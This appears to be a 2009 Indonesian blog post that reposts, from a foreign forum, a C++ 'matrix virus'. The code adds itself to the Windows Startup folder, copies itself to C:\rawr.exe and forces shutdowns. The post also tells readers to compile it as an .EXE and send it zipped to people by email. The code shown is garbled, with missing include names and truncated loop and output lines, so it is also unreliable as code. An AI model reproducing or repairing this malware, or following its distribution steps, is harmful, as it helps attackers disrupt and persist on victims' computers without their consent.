Kamis, 28 Mei 2009

Membuat Matrixs Virus Terbaru

aku nemu scrip untuk buat virus matrix dibuat pake notpad
jujur aja nih aku gaktau maksud scripnya.....

ni aku copyin dari forum luar


1. open notpad
2. copy and paste this:



#include
#include
#include
#include
#include
#include
#include
using namespace std;

int main()
{ keybd_event(VK_MENU,0x38,0,0);
keybd_event(VK_RETURN,0x1c,0,0);
keybd_event(VK_RETURN,0x1c,KEYEVENTF_KEYUP,0);
keybd_event(VK_MENU,0x38,KEYEVENTF_KEYUP,0);
HANDLE outToScreen;
outToScreen = GetStdHandle(STD_OUTPUT_HANDLE);

{
char buffer[255];
char inputFile[]="C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\rawr.bat";
ifstream input(inputFile);
if (!input)
{
{
ofstream fp("C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\rawr.bat", ios::app);
fp << "@ECHO OFF \n";
fp << "START C:\\rawr.exe \n";
fp << "EXIT";
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
}
}
}

{
char buffer[255];
char inputFile[]="C:\\rawr.exe";
ifstream input(inputFile);
if (!input)
{
{
{
ofstream fp("CLICK.bat", ios::app);
fp << "@ECHO OFF \n";
fp << "COPY matrix.exe C:\\rawr.exe \n";
fp << "START C:\\rawr.exe \n";
fp << "EXIT";
}
system("START CLICK.bat");
main();
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
system("call shutdown.exe -S");
goto START;
}
}
}

START:{
for(int i = 0; i <>
{
int num = (rand() % 10);
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN | FOREGROUND_INTENSITY);
cout <<>
cout <<>
cout <<>
cout <<>
cout <<>
cout <<>
cout <<>
cout <<>
cout <<>
cout <<>
cout <<>
cout <<>
Sleep(60);
}
}
for ( int j = 0; j <>
{
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN);
int number = (rand() % 24);
cout <<>
}
goto START;
}


3. save the file as anything u want .EXE example : LOL!!.EXE

4. send the file to ppl BUT DONT OPEN THE FILE!!

how to send the file on hotmail
u cant send the file in hotmail because it wont work so what do u need to do is make a zip folder and put the virus in it then send it

hope u like it

enjoy!!


yang berminat silahkan coba dan artikan sendiri.....
ini postingan baru dari forum luar

Comments :

0 komentar to “Membuat Matrixs Virus Terbaru”

Posting Komentar

 

Daftar Blog Saya

Mengenai Saya

Foto saya
saya seorang panitia akhirat

Followers

Copyright © 2009 by Artikel
Themes : Magazine Style by Blogger Magazine